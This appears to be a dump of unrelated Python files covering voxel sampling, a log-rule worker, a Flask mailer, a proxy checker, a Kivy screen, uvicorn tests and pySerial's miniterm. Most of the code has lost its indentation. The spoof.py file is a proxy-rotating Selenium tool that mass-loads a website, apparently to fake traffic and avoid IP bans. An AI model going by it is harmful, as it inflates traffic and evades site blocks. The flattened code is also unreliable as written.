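        # Here multiplier = 256/64 = 4 and halfie = 2: a coarse voxel is marked occupied if any
        # voxel of its 4x4x4 block in the 256^3 grid is occupied (max-pooling).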
for i in range(dim_voxel):
for j in range(dim_voxel):
for k in range(dim_voxel):
voxel_model_temp[i,j,k] = np.max(voxel_model_256[i*multiplier:(i+1)*multiplier,j*multiplier:(j+1)*multiplier,k*multiplier:(k+1)*multiplier])
#write voxel
sample_voxels = np.reshape(voxel_model_temp, (dim_voxel,dim_voxel,dim_voxel,1))
#sample points near surface
batch_size = batch_size_3
sample_points = np.zeros([batch_size,3],np.uint8)
sample_values = np.zeros([batch_size,1],np.uint8)
batch_size_counter = 0
voxel_model_temp_flag = np.zeros([dim_voxel,dim_voxel,dim_voxel],np.uint8)
temp_range = list(range(1,dim_voxel-1,4))+list(range(2,dim_voxel-1,4))+list(range(3,dim_voxel-1,4))+list(range(4,dim_voxel-1,4))
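        # temp_range lists every interior index 1..dim_voxel-2, grouped by stride-4 offsets
        # (1,5,9,..., then 2,6,..., etc.), so that if the point budget runs out early the
        # collected samples are still spread across the volume instead of clustering at low indices.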
for j in temp_range:
if (batch_size_counter>=batch_size): break
for i in temp_range:
if (batch_size_counter>=batch_size): break
for k in temp_range:
if (batch_size_counter>=batch_size): break
if (np.max(voxel_model_temp[i-1:i+2,j-1:j+2,k-1:k+2])!=np.min(voxel_model_temp[i-1:i+2,j-1:j+2,k-1:k+2])):
si,sj,sk = sample_point_in_cube(voxel_model_256[i*multiplier:(i+1)*multiplier,j*multiplier:(j+1)*multiplier,k*multiplier:(k+1)*multiplier],voxel_model_temp[i,j,k],halfie)
sample_points[batch_size_counter,0] = si+i*multiplier
sample_points[batch_size_counter,1] = sj+j*multiplier
sample_points[batch_size_counter,2] = sk+k*multiplier
sample_values[batch_size_counter,0] = voxel_model_temp[i,j,k]
voxel_model_temp_flag[i,j,k] = 1
batch_size_counter +=1
if (batch_size_counter>=batch_size):
print("64-- batch_size exceeded!")
exceed_64_flag = 1
else:
exceed_64_flag = 0
#fill other slots with random points
while (batch_size_counter<batch_size):
while True:
i = random.randint(0,dim_voxel-1)
j = random.randint(0,dim_voxel-1)
k = random.randint(0,dim_voxel-1)
if voxel_model_temp_flag[i,j,k] != 1: break
si,sj,sk = sample_point_in_cube(voxel_model_256[i*multiplier:(i+1)*multiplier,j*multiplier:(j+1)*multiplier,k*multiplier:(k+1)*multiplier],voxel_model_temp[i,j,k],halfie)
sample_points[batch_size_counter,0] = si+i*multiplier
sample_points[batch_size_counter,1] = sj+j*multiplier
sample_points[batch_size_counter,2] = sk+k*multiplier
sample_values[batch_size_counter,0] = voxel_model_temp[i,j,k]
voxel_model_temp_flag[i,j,k] = 1
batch_size_counter +=1
sample_points_64 = sample_points
sample_values_64 = sample_values
#compress model 256 -> 32
dim_voxel = 32
voxel_model_temp = np.zeros([dim_voxel,dim_voxel,dim_voxel],np.uint8)
multiplier = int(256/dim_voxel)
halfie = int(multiplier/2)
for i in range(dim_voxel):
for j in range(dim_voxel):
for k in range(dim_voxel):
voxel_model_temp[i,j,k] = np.max(voxel_model_256[i*multiplier:(i+1)*multiplier,j*multiplier:(j+1)*multiplier,k*multiplier:(k+1)*multiplier])
#sample points near surface
batch_size = batch_size_2
sample_points = np.zeros([batch_size,3],np.uint8)
sample_values = np.zeros([batch_size,1],np.uint8)
batch_size_counter = 0
voxel_model_temp_flag = np.zeros([dim_voxel,dim_voxel,dim_voxel],np.uint8)
temp_range = list(range(1,dim_voxel-1,4))+list(range(2,dim_voxel-1,4))+list(range(3,dim_voxel-1,4))+list(range(4,dim_voxel-1,4))
for j in temp_range:
if (batch_size_counter>=batch_size): break
for i in temp_range:
if (batch_size_counter>=batch_size): break
for k in temp_range:
if (batch_size_counter>=batch_size): break
if (np.max(voxel_model_temp[i-1:i+2,j-1:j+2,k-1:k+2])!=np.min(voxel_model_temp[i-1:i+2,j-1:j+2,k-1:k+2])):
si,sj,sk = sample_point_in_cube(voxel_model_256[i*multiplier:(i+1)*multiplier,j*multiplier:(j+1)*multiplier,k*multiplier:(k+1)*multiplier],voxel_model_temp[i,j,k],halfie)
sample_points[batch_size_counter,0] = si+i*multiplier
sample_points[batch_size_counter,1] = sj+j*multiplier
sample_points[batch_size_counter,2] = sk+k*multiplier
sample_values[batch_size_counter,0] = voxel_model_temp[i,j,k]
voxel_model_temp_flag[i,j,k] = 1
batch_size_counter +=1
if (batch_size_counter>=batch_size):
print("32-- batch_size exceeded!")
exceed_32_flag = 1
else:
exceed_32_flag = 0
#fill other slots with random points
while (batch_size_counter<batch_size):
while True:
i = random.randint(0,dim_voxel-1)
j = random.randint(0,dim_voxel-1)
k = random.randint(0,dim_voxel-1)
if voxel_model_temp_flag[i,j,k] != 1: break
si,sj,sk = sample_point_in_cube(voxel_model_256[i*multiplier:(i+1)*multiplier,j*multiplier:(j+1)*multiplier,k*multiplier:(k+1)*multiplier],voxel_model_temp[i,j,k],halfie)
sample_points[batch_size_counter,0] = si+i*multiplier
sample_points[batch_size_counter,1] = sj+j*multiplier
sample_points[batch_size_counter,2] = sk+k*multiplier
sample_values[batch_size_counter,0] = voxel_model_temp[i,j,k]
voxel_model_temp_flag[i,j,k] = 1
batch_size_counter +=1
sample_points_32 = sample_points
sample_values_32 = sample_values
#compress model 256 -> 16
dim_voxel = 16
voxel_model_temp = np.zeros([dim_voxel,dim_voxel,dim_voxel],np.uint8)
multiplier = int(256/dim_voxel)
halfie = int(multiplier/2)
for i in range(dim_voxel):
for j in range(dim_voxel):
for k in range(dim_voxel):
voxel_model_temp[i,j,k] = np.max(voxel_model_256[i*multiplier:(i+1)*multiplier,j*multiplier:(j+1)*multiplier,k*multiplier:(k+1)*multiplier])
#sample points near surface
batch_size = batch_size_1
sample_points = np.zeros([batch_size,3],np.uint8)
sample_values = np.zeros([batch_size,1],np.uint8)
batch_size_counter = 0
for i in range(dim_voxel):
for j in range(dim_voxel):
for k in range(dim_voxel):
si,sj,sk = sample_point_in_cube(voxel_model_256[i*multiplier:(i+1)*multiplier,j*multiplier:(j+1)*multiplier,k*multiplier:(k+1)*multiplier],voxel_model_temp[i,j,k],halfie)
sample_points[batch_size_counter,0] = si+i*multiplier
sample_points[batch_size_counter,1] = sj+j*multiplier
sample_points[batch_size_counter,2] = sk+k*multiplier
sample_values[batch_size_counter,0] = voxel_model_temp[i,j,k]
batch_size_counter +=1
if (batch_size_counter!=batch_size):
print("batch_size_counter!=batch_size")
sample_points_16 = sample_points
sample_values_16 = sample_values
q.put([name_list[idx][0],exceed_64_flag,exceed_32_flag,sample_points_64,sample_values_64,sample_points_32,sample_values_32,sample_points_16,sample_values_16,sample_voxels])
def list_image(root, exts):
image_list = []
cat = {}
for path, subdirs, files in os.walk(root):
for fname in files:
fpath = os.path.join(path, fname)
suffix = os.path.splitext(fname)[1].lower()
if os.path.isfile(fpath) and (suffix in exts):
if path not in cat:
cat[path] = len(cat)
image_list.append((os.path.relpath(fpath, root), cat[path]))
return image_list
if __name__ == '__main__':
print(class_name)
if not os.path.exists(class_name):
os.makedirs(class_name)
#dir of voxel models
voxel_input = "/local-scratch/zhiqinc/shapenet_hsp/modelBlockedVoxels256/"+class_name[:8]+"/"
#name of output file
hdf5_path = class_name+'/'+class_name[:8]+'_vox256.hdf5'
#obj_list
fout = open(class_name+'/'+class_name[:8]+'_vox256.txt','w',newline='')
#record statistics
fstatistics = open(class_name+'/statistics.txt','w',newline='')
exceed_32 = 0
exceed_64 = 0
image_list = list_image(voxel_input, ['.mat'])
name_list = []
for i in range(len(image_list)):
imagine=image_list[i][0]
name_list.append(imagine[0:-4])
name_list = sorted(name_list)
name_num = len(name_list)
for i in range(name_num):
fout.write(name_list[i]+"\n")
fout.close()
#prepare list of names
num_of_process = 12
list_of_list_of_names = []
for i in range(num_of_process):
list_of_names = []
for j in range(i,name_num,num_of_process):
list_of_names.append([j, voxel_input+name_list[j]+".mat"])
list_of_list_of_names.append(list_of_names)
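    # Names are split round-robin: process i handles shapes i, i+12, i+24, ..., and each entry
    # keeps its global index j so results can be written back to the correct HDF5 row.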
#map processes
q = Queue()
workers = [Process(target=get_points_from_vox, args = (q, list_of_names)) for list_of_names in list_of_list_of_names]
for p in workers:
p.start()
#reduce process
hdf5_file = h5py.File(hdf5_path, 'w')
hdf5_file.create_dataset("voxels", [name_num,dim,dim,dim,1], np.uint8)
hdf5_file.create_dataset("points_16", [name_num,batch_size_1,3], np.uint8)
hdf5_file.create_dataset("values_16", [name_num,batch_size_1,1], np.uint8)
hdf5_file.create_dataset("points_32", [name_num,batch_size_2,3], np.uint8)
hdf5_file.create_dataset("values_32", [name_num,batch_size_2,1], np.uint8)
hdf5_file.create_dataset("points_64", [name_num,batch_size_3,3], np.uint8)
hdf5_file.create_dataset("values_64", [name_num,batch_size_3,1], np.uint8)
while True:
item_flag = True
try:
idx,exceed_64_flag,exceed_32_flag,sample_points_64,sample_values_64,sample_points_32,sample_values_32,sample_points_16,sample_values_16,sample_voxels = q.get(True, 1.0)
except queue.Empty:
item_flag = False
if item_flag:
#process result
exceed_32+=exceed_32_flag
exceed_64+=exceed_64_flag
hdf5_file["points_64"][idx,:,:] = sample_points_64
hdf5_file["values_64"][idx,:,:] = sample_values_64
hdf5_file["points_32"][idx,:,:] = sample_points_32
hdf5_file["values_32"][idx,:,:] = sample_values_32
hdf5_file["points_16"][idx,:,:] = sample_points_16
hdf5_file["values_16"][idx,:,:] = sample_values_16
hdf5_file["voxels"][idx,:,:,:,:] = sample_voxels
allExited = True
for p in workers:
if p.exitcode is None:
allExited = False
break
if allExited and q.empty():
break
fstatistics.write("total: "+str(name_num)+"\n")
fstatistics.write("exceed_32: "+str(exceed_32)+"\n")
fstatistics.write("exceed_32_ratio: "+str(float(exceed_32)/name_num)+"\n")
fstatistics.write("exceed_64: "+str(exceed_64)+"\n")
fstatistics.write("exceed_64_ratio: "+str(float(exceed_64)/name_num)+"\n")
fstatistics.close()
hdf5_file.close()
print("finished")
|
workerResultLog.py
|
# -*- coding: utf-8 -*-
from polylogyx.application import create_app
from polylogyx.settings import CurrentConfig
from polylogyx.tasks import analyse_result_log_data_with_rule_ioc_intel
import threading
app = create_app(config=CurrentConfig)
def match_with_rules():
while True:
print('executing and matching with rules...')
task=analyse_result_log_data_with_rule_ioc_intel.apply_async(queue='default_queue_tasks')
task.get()
print('execution finished...')
thread_count = 1
for i in range(thread_count):
t = threading.Thread(target=match_with_rules)
t.start()
|
old_email.py
|
from flask_mail import Message
from app import app, mail
from threading import Thread
from flask import render_template
from flask_babel import _
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(subject, sender, recipients, text_body, html_body):
msg = Message(subject, sender=sender, recipients=recipients)
msg.body = text_body
msg.html = html_body
Thread(target=send_async_email, args=(app, msg)).start()
def send_password_reset_email(user):
token = user.get_reset_password_token()
send_email(_('[Microblog] Reset Your Password'),
sender=app.config['ADMINS'][0],
recipients=[user.email],
text_body=render_template('email/reset_password.txt',
user=user, token=token),
html_body=render_template('email/reset_password.html',
user=user, token=token))
|
try_proxies.py
|
"""爬代理"""
import os
import sys
sys.path.append(os.pardir)
import threading
from math import ceil
from lazy_spider.utils import get_sqlite_db
from lazy_spider.generic.proxy import *
def clear_proxies(checker: GenericProxyChecker, pool: SqliteProxyPool, proxies):
for proxy in proxies:
try:
r = checker.proxy_info(proxy)
if r == checker.CANT_TELNET:
print(f'cant telnet[{str(proxy)}]')
elif r == checker.CANT_PROXY:
print(f'\033[1;44;31mcant proxy[{str(proxy)}]\033[0m')
else:
                print(f'\033[1;42;31m[{str(proxy)}] looks good!\033[0m')
# del proxy
if r == checker.CANT_TELNET:
_, _, host, port = parse_proxy_url(list(proxy.values())[0])
del_cont = pool.del_proxy(str(host), int(port))
if not del_cont:
print('del_cont:', del_cont)
except Exception as e:
logger.exception(e)
def main():
checker = GenericProxyChecker(Apis('223.156.141.144'))
checker.set_sock_timeout(1)
pool = SqliteProxyPool(get_sqlite_db())
threading_counts = 40
check_counts = 800
proxies = pool.get_proxies(check_counts)
threads = []
partial = ceil(len(proxies) / threading_counts)
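    # Split the fetched proxies into roughly equal contiguous chunks, one per thread
    # (threading_counts = 40); proxies that cannot even be reached (CANT_TELNET) are
    # deleted from the SQLite pool by clear_proxies.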
for i in range(0, len(proxies), partial):
temp = slice(i, i + partial)
each_process = proxies[temp]
print('thread start')
t = threading.Thread(target=clear_proxies, args=(checker, pool, each_process))
t.start()
threads.append(t)
for t in threads:
t.join()
if __name__ == '__main__':
exit(main())
|
offlinescreen.py
|
from kivy.uix.screenmanager import Screen
from ui.modals import GameModal
import threading
class OfflineScreen(Screen):
active_pop = None #active popup on the screen
def __init__(self,CApp,**kwargs):
super(OfflineScreen, self).__init__(**kwargs)
self.app = CApp
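    # Each mode handler below opens a blocking "Starting ... mode" popup and launches the
    # matching game routine on a daemon thread so the Kivy UI stays responsive; the screen
    # itself is passed along so the routine can report failures via error_message().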
def training(self, *args):
self.offline_pop("Training")
caster = threading.Thread(target=self.app.game.training,args=[self],daemon=True)
caster.start()
def replays(self, *args):
self.offline_pop("Replay Theater")
caster = threading.Thread(target=self.app.game.replays,args=[self],daemon=True)
caster.start()
def local(self, *args):
self.offline_pop("Local VS")
caster = threading.Thread(target=self.app.game.local,args=[self],daemon=True)
caster.start()
def cpu(self, *args):
self.offline_pop("VS CPU")
caster = threading.Thread(target=self.app.game.cpu,args=[self],daemon=True)
caster.start()
def tournament(self, *args):
self.offline_pop("Tournament VS")
caster = threading.Thread(target=self.app.game.tournament,args=[self],daemon=True)
caster.start()
def standalone(self, *args):
self.offline_pop("Standalone")
caster = threading.Thread(target=self.app.game.standalone,args=[self],daemon=True)
caster.start()
def offline_pop(self, mode):
popup = GameModal()
popup.modal_txt.text = 'Starting %s mode...' % mode
popup.close_btn.text = "Stand by..."
popup.close_btn.disabled = True
popup.open()
self.app.offline_mode = mode
self.active_pop = popup
def error_message(self,e):
if self.active_pop != None:
self.active_pop.modal_txt.text = ""
for i in e:
self.active_pop.modal_txt.text += i + '\n'
self.active_pop.close_btn.disabled = False
self.active_pop.close_btn.bind(on_release=self.active_pop.dismiss)
self.active_pop.close_btn.text = "Close"
else:
popup = GameModal()
for i in e:
popup.modal_txt.text += i + '\n'
popup.close_btn.bind(on_release=popup.dismiss)
popup.close_btn.text = "Close"
popup.open()
|
spoof.py
|
from selenium import webdriver
from os import system
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.chrome.options import Options
import json, os, zipfile, threading, time
def threaded_spoof_not_auth(website,PROXY,path):
options = webdriver.ChromeOptions()
options.add_argument('--proxy-server=%s' % PROXY)
options.add_experimental_option('excludeSwitches', ['enable-logging'])
options.add_experimental_option("detach", True)
options.add_argument('window-size=760x980')
driver = webdriver.Chrome(options=options,executable_path=path)
try:
driver.get(website)
except:
input('\x1b[1;31mProxy Error')
def threaded_spoof_auth(PROXY_HOST, PROXY_PORT, PROXY_USER, PROXY_PASS, website):
manifest_json = """
{
"version": "1.0.0",
"manifest_version": 2,
"name": "Chrome Proxy",
"permissions": [
"proxy",
"tabs",
"unlimitedStorage",
"storage",
"<all_urls>",
"webRequest",
"webRequestBlocking"
],
"background": {
"scripts": ["background.js"]
},
"minimum_chrome_version":"22.0.0"
}
"""
background_js = """
var config = {
mode: "fixed_servers",
rules: {
singleProxy: {
scheme: "http",
host: "%s",
port: parseInt(%s)
},
bypassList: ["localhost"]
}
};
chrome.proxy.settings.set({value: config, scope: "regular"}, function() {});
function callbackFn(details) {
return {
authCredentials: {
username: "%s",
password: "%s"
}
};
}
chrome.webRequest.onAuthRequired.addListener(
callbackFn,
{urls: ["<all_urls>"]},
['blocking']
);
""" % (PROXY_HOST, PROXY_PORT, PROXY_USER, PROXY_PASS)
def get_chromedrivera(use_proxy=False, user_agent=None):
c = open('Settings.json')
data = json.load(c)
version = data['chromedriver_version']
chromedriverpath = f'chromedriver{version}.exe'
path = os.path.dirname(os.path.abspath(__file__))
options = webdriver.ChromeOptions()
if use_proxy:
#options.add_argument("--headless")
options.add_experimental_option('excludeSwitches', ['enable-logging'])
options.add_argument('window-size=760x980')
pluginfile = 'proxy_auth_plugin.zip'
with zipfile.ZipFile(pluginfile, 'w') as zp:
#options.add_argument("--headless")
options.add_experimental_option('excludeSwitches', ['enable-logging'])
options.add_argument('window-size=760x980')
zp.writestr("manifest.json", manifest_json)
zp.writestr("background.js", background_js)
options.add_extension(pluginfile)
if user_agent:
options.add_experimental_option('excludeSwitches', ['enable-logging'])
options.add_argument('window-size=760x980')
#options.add_argument("--headless")
options.add_argument('--user-agent=%s' % user_agent)
driver = webdriver.Chrome(executable_path=chromedriverpath,options=options)
return driver
def mainspoof():
driver = get_chromedrivera(use_proxy=True)
driver.get(website)
mainspoof()
def no_proxy(website,path):
startTime = time.time()
options = webdriver.ChromeOptions()
options.add_experimental_option('excludeSwitches', ['enable-logging'])
options.add_experimental_option("detach", True)
options.add_argument('window-size=760x980')
driver = webdriver.Chrome(options=options,executable_path=path)
driver.get(website)
def spoof_browser():
r = open("Settings.json")
ipproxies = json.load(r)
wait = ipproxies['Spoof-Task-Amount']
version = ipproxies['chromedriver_version']
chromedriverpath = f'chromedriver{version}.exe'
if os.path.getsize("BrowserSpooferProxies.txt") == 0:
I1 = input('There are no proxies loaded, do you want to go proxyless [y/n] ')
if I1 == 'y':
print('\x1b[1;31mWARNING, IF YOU GO PROXYLESS YOU HAVE A RISK OF GETTING YOUR IP BANNED!')
time.sleep(3)
website = input("\x1b[1;36mWhich Website Do You Want To Spoof?\x1b[1;37m: ")
waittime = int(wait)* 4
main_wait_time = waittime / 10
print('\x1b[1;36mEstimated Load Time\x1b[1;37m: {}s'.format(main_wait_time))
for y in range(int(wait)):
thread = threading.Thread(target=no_proxy, args=(website,chromedriverpath,))
thread.start()
S4 = input("\x1b[1;36m CLICK \x1b[1;37m'\x1b[1;36mENTER\x1b[1;37m' \x1b[1;36mWHEN YOU ARE DONE\x1b[1;37m: ")
elif I1 == 'n':
print('Add proxies!')
time.sleep(1)
spoof_browser()
else:
website = input("\x1b[1;36mWhich Website Do You Want To Spoof?\x1b[1;37m: ")
proxies = open('BrowserSpooferProxies.txt','r')
for y in range(int(wait)):
line = proxies.readline()[:-1]
if len(line.split(':'))==4:
PROXY_HOST = (line.split(':')[0])
PROXY_PORT = (line.split(':')[1])
PROXY_USER = (line.split(':')[2])
PROXY_PASS = (line.split(':')[3])
waittime = int(wait)* 4
main_wait_time = waittime / 10
print('\x1b[1;36mEstimated Load Time\x1b[1;37m: {}s'.format(main_wait_time))
thread = threading.Thread(target=threaded_spoof_auth, args=(PROXY_HOST, PROXY_PORT, PROXY_USER, PROXY_PASS,website,))
thread.start()
else:
startTime = time.time()
ip = (line.split(':')[0])
port = (line.split(':')[1])
PROXY = ip+":"+port
waittime = int(wait)* 4
main_wait_time = waittime / 10
print('\x1b[1;36mEstimated Load Time\x1b[1;37m: {}s'.format(main_wait_time))
thread = threading.Thread(target=threaded_spoof_not_auth, args=(website,PROXY))
thread.start()
S4 = input("\x1b[1;36m CLICK \x1b[1;37m'\x1b[1;36mENTER\x1b[1;37m' \x1b[1;36mWHEN YOU ARE DONE\x1b[1;37m: ")
try:
os.system('cls')
spoof_browser()
except Exception as ex:
print(ex)
|
test_main.py
|
import asyncio
import threading
import time
import pytest
import requests
from uvicorn.config import Config
from uvicorn.main import Server
async def app(scope, receive, send):
assert scope["type"] == "http"
await send({"type": "http.response.start", "status": 204, "headers": []})
await send({"type": "http.response.body", "body": b"", "more_body": False})
@pytest.mark.parametrize(
"host, url",
[
pytest.param(None, "http://127.0.0.1:8000", id="default"),
pytest.param("localhost", "http://127.0.0.1:8000", id="hostname"),
pytest.param("::1", "http://[::1]:8000", id="ipv6"),
],
)
def test_run(host, url):
config = Config(app=app, host=host, loop="asyncio", limit_max_requests=1)
server = Server(config=config)
thread = threading.Thread(target=server.run)
thread.start()
while not server.started:
time.sleep(0.01)
response = requests.get(url)
assert response.status_code == 204
thread.join()
def test_run_multiprocess():
config = Config(app=app, loop="asyncio", workers=2, limit_max_requests=1)
server = Server(config=config)
thread = threading.Thread(target=server.run)
thread.start()
while not server.started:
time.sleep(0.01)
response = requests.get("http://127.0.0.1:8000")
assert response.status_code == 204
thread.join()
def test_run_reload():
config = Config(app=app, loop="asyncio", reload=True, limit_max_requests=1)
server = Server(config=config)
thread = threading.Thread(target=server.run)
thread.start()
while not server.started:
time.sleep(0.01)
response = requests.get("http://127.0.0.1:8000")
assert response.status_code == 204
thread.join()
def test_run_with_shutdown():
async def app(scope, receive, send):
assert scope["type"] == "http"
while True:
time.sleep(1)
config = Config(app=app, loop="asyncio", workers=2, limit_max_requests=1)
server = Server(config=config)
sock = config.bind_socket()
exc = True
def safe_run():
nonlocal exc, server
try:
exc = None
config.setup_event_loop()
loop = asyncio.get_event_loop()
loop.run_until_complete(server.serve(sockets=[sock]))
except Exception as e:
exc = e
thread = threading.Thread(target=safe_run)
thread.start()
while not server.started:
time.sleep(0.01)
server.should_exit = True
thread.join()
assert exc is None
|
miniterm.py
|
#!/home/pi/Adafruit_CircuitPython_ServoKit/envSERVOKIT/bin/python3
#
# Very simple serial terminal
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
import codecs
import os
import sys
import threading
import serial
from serial.tools.list_ports import comports
from serial.tools import hexlify_codec
# pylint: disable=wrong-import-order,wrong-import-position
codecs.register(lambda c: hexlify_codec.getregentry() if c == 'hexlify' else None)
try:
raw_input
except NameError:
# pylint: disable=redefined-builtin,invalid-name
raw_input = input # in python3 it's "raw"
unichr = chr
def key_description(character):
"""generate a readable description for a key"""
ascii_code = ord(character)
if ascii_code < 32:
return 'Ctrl+{:c}'.format(ord('@') + ascii_code)
else:
return repr(character)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class ConsoleBase(object):
"""OS abstraction for console (input/output codec, no echo)"""
def __init__(self):
if sys.version_info >= (3, 0):
self.byte_output = sys.stdout.buffer
else:
self.byte_output = sys.stdout
self.output = sys.stdout
def setup(self):
"""Set console to read single characters, no echo"""
def cleanup(self):
"""Restore default console settings"""
def getkey(self):
"""Read a single key from the console"""
return None
def write_bytes(self, byte_string):
"""Write bytes (already encoded)"""
self.byte_output.write(byte_string)
self.byte_output.flush()
def write(self, text):
"""Write string"""
self.output.write(text)
self.output.flush()
def cancel(self):
"""Cancel getkey operation"""
# - - - - - - - - - - - - - - - - - - - - - - - -
# context manager:
# switch terminal temporary to normal mode (e.g. to get user input)
def __enter__(self):
self.cleanup()
return self
def __exit__(self, *args, **kwargs):
self.setup()
if os.name == 'nt': # noqa
import msvcrt
import ctypes
class Out(object):
"""file-like wrapper that uses os.write"""
def __init__(self, fd):
self.fd = fd
def flush(self):
pass
def write(self, s):
os.write(self.fd, s)
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self._saved_ocp = ctypes.windll.kernel32.GetConsoleOutputCP()
self._saved_icp = ctypes.windll.kernel32.GetConsoleCP()
ctypes.windll.kernel32.SetConsoleOutputCP(65001)
ctypes.windll.kernel32.SetConsoleCP(65001)
self.output = codecs.getwriter('UTF-8')(Out(sys.stdout.fileno()), 'replace')
# the change of the code page is not propagated to Python, manually fix it
sys.stderr = codecs.getwriter('UTF-8')(Out(sys.stderr.fileno()), 'replace')
sys.stdout = self.output
self.output.encoding = 'UTF-8' # needed for input
def __del__(self):
ctypes.windll.kernel32.SetConsoleOutputCP(self._saved_ocp)
ctypes.windll.kernel32.SetConsoleCP(self._saved_icp)
def getkey(self):
while True:
z = msvcrt.getwch()
if z == unichr(13):
return unichr(10)
elif z in (unichr(0), unichr(0x0e)): # functions keys, ignore
msvcrt.getwch()
else:
return z
def cancel(self):
# CancelIo, CancelSynchronousIo do not seem to work when using
# getwch, so instead, send a key to the window with the console
hwnd = ctypes.windll.kernel32.GetConsoleWindow()
ctypes.windll.user32.PostMessageA(hwnd, 0x100, 0x0d, 0)
elif os.name == 'posix':
import atexit
import termios
import fcntl
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self.fd = sys.stdin.fileno()
self.old = termios.tcgetattr(self.fd)
atexit.register(self.cleanup)
if sys.version_info < (3, 0):
self.enc_stdin = codecs.getreader(sys.stdin.encoding)(sys.stdin)
else:
self.enc_stdin = sys.stdin
def setup(self):
new = termios.tcgetattr(self.fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, new)
def getkey(self):
c = self.enc_stdin.read(1)
if c == unichr(0x7f):
c = unichr(8) # map the BS key (which yields DEL) to backspace
return c
def cancel(self):
fcntl.ioctl(self.fd, termios.TIOCSTI, b'\0')
def cleanup(self):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
else:
raise NotImplementedError(
'Sorry no implementation for your platform ({}) available.'.format(sys.platform))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class Transform(object):
"""do-nothing: forward all data unchanged"""
def rx(self, text):
"""text received from serial port"""
return text
def tx(self, text):
"""text to be sent to serial port"""
return text
def echo(self, text):
"""text to be sent but displayed on console"""
return text
class CRLF(Transform):
"""ENTER sends CR+LF"""
def tx(self, text):
return text.replace('\n', '\r\n')
class CR(Transform):
"""ENTER sends CR"""
def rx(self, text):
return text.replace('\r', '\n')
def tx(self, text):
return text.replace('\n', '\r')
class LF(Transform):
"""ENTER sends LF"""
class NoTerminal(Transform):
"""remove typical terminal control codes from input"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32) if unichr(x) not in '\r\n\b\t')
REPLACEMENT_MAP.update(
{
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
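    # 0x2400 + x lands in the Unicode "Control Pictures" block, so stripped control codes are
    # rendered as visible placeholder glyphs instead of being interpreted by the terminal.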
def rx(self, text):
return text.translate(self.REPLACEMENT_MAP)
echo = rx
class NoControls(NoTerminal):
"""Remove all control codes, incl. CR+LF"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32))
REPLACEMENT_MAP.update(
{
0x20: 0x2423, # visual space
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
class Printable(Transform):
"""Show decimal code for all non-ASCII characters and replace most control codes"""
def rx(self, text):
r = []
for c in text:
if ' ' <= c < '\x7f' or c in '\r\n\b\t':
r.append(c)
elif c < ' ':
r.append(unichr(0x2400 + ord(c)))
else:
r.extend(unichr(0x2080 + ord(d) - 48) for d in '{:d}'.format(ord(c)))
r.append(' ')
return ''.join(r)
echo = rx
class Colorize(Transform):
"""Apply different colors for received and echo"""
def __init__(self):
# XXX make it configurable, use colorama?
self.input_color = '\x1b[37m'
self.echo_color = '\x1b[31m'
def rx(self, text):
return self.input_color + text
def echo(self, text):
return self.echo_color + text
class DebugIO(Transform):
"""Print what is sent and received"""
def rx(self, text):
sys.stderr.write(' [RX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
def tx(self, text):
sys.stderr.write(' [TX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
# other ideas:
# - add date/time for each newline
# - insert newline after: a) timeout b) packet end character
EOL_TRANSFORMATIONS = {
'crlf': CRLF,
'cr': CR,
'lf': LF,
}
TRANSFORMATIONS = {
'direct': Transform, # no transformation
'default': NoTerminal,
'nocontrol': NoControls,
'printable': Printable,
'colorize': Colorize,
'debug': DebugIO,
}
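# Miniterm.update_transformations() combines these registries: the selected EOL transform plus
# any filters are applied in order for tx and in reverse order for rx.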
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def ask_for_port():
"""\
Show a list of ports and ask the user for a choice. To make selection
easier on systems with long device names, also allow the input of an
index.
"""
sys.stderr.write('\n--- Available ports:\n')
ports = []
for n, (port, desc, hwid) in enumerate(sorted(comports()), 1):
sys.stderr.write('--- {:2}: {:20} {!r}\n'.format(n, port, desc))
ports.append(port)
while True:
port = raw_input('--- Enter port index or full name: ')
try:
index = int(port) - 1
if not 0 <= index < len(ports):
sys.stderr.write('--- Invalid index!\n')
continue
except ValueError:
pass
else:
port = ports[index]
return port
class Miniterm(object):
"""\
Terminal application. Copy data from serial port to console and vice versa.
Handle special keys from the console to show menu etc.
"""
def __init__(self, serial_instance, echo=False, eol='crlf', filters=()):
self.console = Console()
self.serial = serial_instance
self.echo = echo
self.raw = False
self.input_encoding = 'UTF-8'
self.output_encoding = 'UTF-8'
self.eol = eol
self.filters = filters
self.update_transformations()
self.exit_character = 0x1d # GS/CTRL+]
self.menu_character = 0x14 # Menu: CTRL+T
self.alive = None
self._reader_alive = None
self.receiver_thread = None
self.rx_decoder = None
self.tx_decoder = None
def _start_reader(self):
"""Start reader thread"""
self._reader_alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader, name='rx')
self.receiver_thread.daemon = True
self.receiver_thread.start()
def _stop_reader(self):
"""Stop reader thread only, wait for clean exit of thread"""
self._reader_alive = False
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def start(self):
"""start worker threads"""
self.alive = True
self._start_reader()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer, name='tx')
self.transmitter_thread.daemon = True
self.transmitter_thread.start()
self.console.setup()
def stop(self):
"""set flag to stop worker threads"""
self.alive = False
def join(self, transmit_only=False):
"""wait for worker threads to terminate"""
self.transmitter_thread.join()
if not transmit_only:
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def close(self):
self.serial.close()
def update_transformations(self):
